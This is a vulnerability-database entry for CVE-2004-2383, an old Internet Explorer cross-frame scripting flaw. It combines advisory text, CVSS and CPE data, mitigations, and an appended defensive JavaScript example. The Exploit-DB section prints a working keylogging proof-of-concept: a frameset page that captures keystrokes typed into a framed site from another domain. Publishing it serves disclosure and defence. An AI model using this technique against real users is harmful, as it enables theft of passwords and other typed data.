CVE-2004-2383
CVSS 5.1
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:43:58

[Original] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario; the discloser provides alternate scenarios. Spoofing scenarios are currently included in CVE.


[CNNVD] Microsoft Internet Explorer Cross-Frame Scripting Restriction Bypass Vulnerability (CNNVD-200412-571)

        Microsoft Internet Explorer is a popular web browser.
        Microsoft Internet Explorer contains an access validation error. A remote attacker can exploit it to bypass the cross-frame scripting restrictions and have malicious script executed in a context that is blindly treated as 'trusted'.
        The problem is caused by insufficient restrictions in IE's event handling functions. According to Microsoft Knowledge Base Article 167796 ( http://support.microsoft.com/support/kb/articles/Q167/7/96.asp ), frame access across different domains must be restricted. However, by constructing a frame definition that contains malicious JavaScript, the frame access restriction can be bypassed.
        An attacker can exploit this vulnerability by luring a user to visit a page containing the malicious frame, in order to obtain sensitive information or to have the user visit a spoofed page in a trusted context.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:microsoft:ie:5.5        Microsoft IE 5.5
cpe:/a:microsoft:ie:6.0:sp1
cpe:/a:microsoft:ie:5.5:sp1    Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:5.5:sp2    Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:6.0        Microsoft Internet Explorer 6.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2383
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2383
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-571
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/15337
(UNKNOWN)  XF  ie-frame-domain-bypass(15337)
http://www.securityfocus.com/bid/9761
(UNKNOWN)  BID  9761
http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities&flashstatus=false
(UNKNOWN)  IDEFENSE  20040227 Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass

- Vulnerability information

Microsoft Internet Explorer Cross-Frame Scripting Restriction Bypass Vulnerability
Medium severity  Access validation error
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        Microsoft
        ---------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:

        http://www.microsoft.com/windows/ie/default.asp

- Vulnerability information (23766)

Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability (EDBID:23766)
windows remote
2004-02-27 Verified
0 iDefense
N/A
source: http://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain.

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
// Keypress handler on the outer document: on affected IE versions it still
// receives the events while the framed page from another domain has focus.
var keylog = '';
document.onkeypress = function () {
  var k = window.event.keyCode;
  window.status = keylog += String.fromCharCode(k) + '[' + k + ']';
};
</script>
</head>
<!-- the frameset forces focus back onto itself so the events keep arriving -->
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
  <frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>

- Vulnerability information

4078
Microsoft IE Cross Frame Scripting Restriction Bypass
Remote / Network Access Input Manipulation, Other
Loss of Integrity
Exploit Public

- Vulnerability description

Microsoft Internet Explorer contains a flaw that may allow a malicious user to bypass certain frame restrictions (aka Cross Frame Scripting aka XFS). The issue is triggered when access validation errors occur within event handling routines. Malicious JavaScript loaded in a parent frame can then record the keyboard events of child frames.

- Timeline

2004-02-27 Unknown
2004-02-27 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workarounds. Both workarounds must be implemented in order to fully protect sensitive forms from any XFS attack scenario.

Workaround Part 1: The following piece of JavaScript should be loaded at the top of all sensitive forms (login, forgot password, registration etc.). It prevents parent frames from loading your sensitive forms into a child frame:

        if (top != self) { top.location=self.location; }

Workaround Part 2: Internet Explorer 6.x has a little-known feature that allows parent frames to load child frames into the Restricted zone by specifying security="restricted" in the frame source code. Loading the frame into the Restricted zone disables cookies and active scripting for that child frame. Example:

        <frame src="http://www.osvdb.org" scrolling="auto" security="restricted">

Because of this feature the workaround from Part 1 is disabled, so that JavaScript is not effective in breaking out of the child frame. The parent frame, however, still has the ability to run script, so malicious JavaScript can record the keyboard events of the child frame. Applications can protect against this by implementing one of two things.

First, all sensitive forms should do a cookie check to ensure that cookies are enabled in the client browser before displaying the sensitive form to the user. If the form is loaded into a child frame that has been placed in the Restricted zone, the cookie check will fail because cookies are disabled in that zone. If cookies are disabled, redirect the user to an error message saying that cookies are required to use your application.

Alternatively, write your sensitive form fields using JavaScript. If the child frame is in fact loaded in the Restricted zone, the sensitive form will not be built because active scripting is disabled in that zone. This requires considerably more code for each sensitive form you are trying to protect.

Note: Microsoft has stated that Internet Explorer 7 will not be available to users on Windows 2000 and earlier platforms. This means users on these platforms will continue to use Internet Explorer 6 and remain vulnerable to these types of attacks.
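The two workarounds above as an added example (not code from the OSVDB entry or the advisory), written in modern JavaScript with the browser objects passed in as parameters so the logic can be exercised outside a browser; the function names, the probe cookie name and the document mock are this example's own assumptions:

```javascript
// Added example (not the OSVDB entry's code): both workarounds as testable
// functions; browser objects are parameters, and all names are this example's own.

// Workaround Part 1 (frame busting): the URL top.location must be set to,
// or null when the page is already the top-level document.
function frameBustTarget(topWin, selfWin) {
  return topWin !== selfWin ? selfWin.location.href : null;
}

// Workaround Part 2 (cookie probe): in IE's Restricted zone (frame
// security="restricted") cookies are off, so a probe cookie does not persist.
function cookiesEnabled(doc) {
  doc.cookie = 'xfs_probe=1; path=/';
  const ok = doc.cookie.indexOf('xfs_probe=1') !== -1;
  doc.cookie = 'xfs_probe=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT';
  return ok;
}

// Gate for a sensitive form: escape framing first, then refuse to render
// when cookies are off. Because a Restricted-zone frame runs no script, the
// same cookie check must also be enforced server-side before the form is sent.
function sensitiveFormDecision(topWin, selfWin, doc) {
  const redirect = frameBustTarget(topWin, selfWin);
  if (redirect !== null) return { render: false, reason: 'framed', redirect };
  if (!cookiesEnabled(doc)) return { render: false, reason: 'cookies-disabled' };
  return { render: true, reason: 'ok' };
}

// Constructed stand-in for document.cookie (cookiesAllowed=false models the
// Restricted zone) so the block can run without a browser.
function makeDocumentMock(cookiesAllowed) {
  const jar = {};
  return {
    get cookie() { return Object.keys(jar).map((k) => k + '=' + jar[k]).join('; '); },
    set cookie(str) {
      if (!cookiesAllowed) return;
      const parts = str.split(';').map((p) => p.trim());
      const eq = parts[0].indexOf('=');
      const name = parts[0].slice(0, eq);
      const expired = parts.slice(1).some((a) => /^expires=.*1970/i.test(a));
      if (expired) delete jar[name]; else jar[name] = parts[0].slice(eq + 1);
    },
  };
}

// In a real page, run the gate at the top of the sensitive form's script.
if (typeof window !== 'undefined') {
  const d = sensitiveFormDecision(window.top, window.self, document);
  if (d.redirect) window.top.location = d.redirect;
}
```

The client-side gate alone cannot help when scripting is disabled in the child frame, which is why the decision logic is written so the same cookie check can be repeated on the server.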

- Related references

- Vulnerability author

Unknown or Incomplete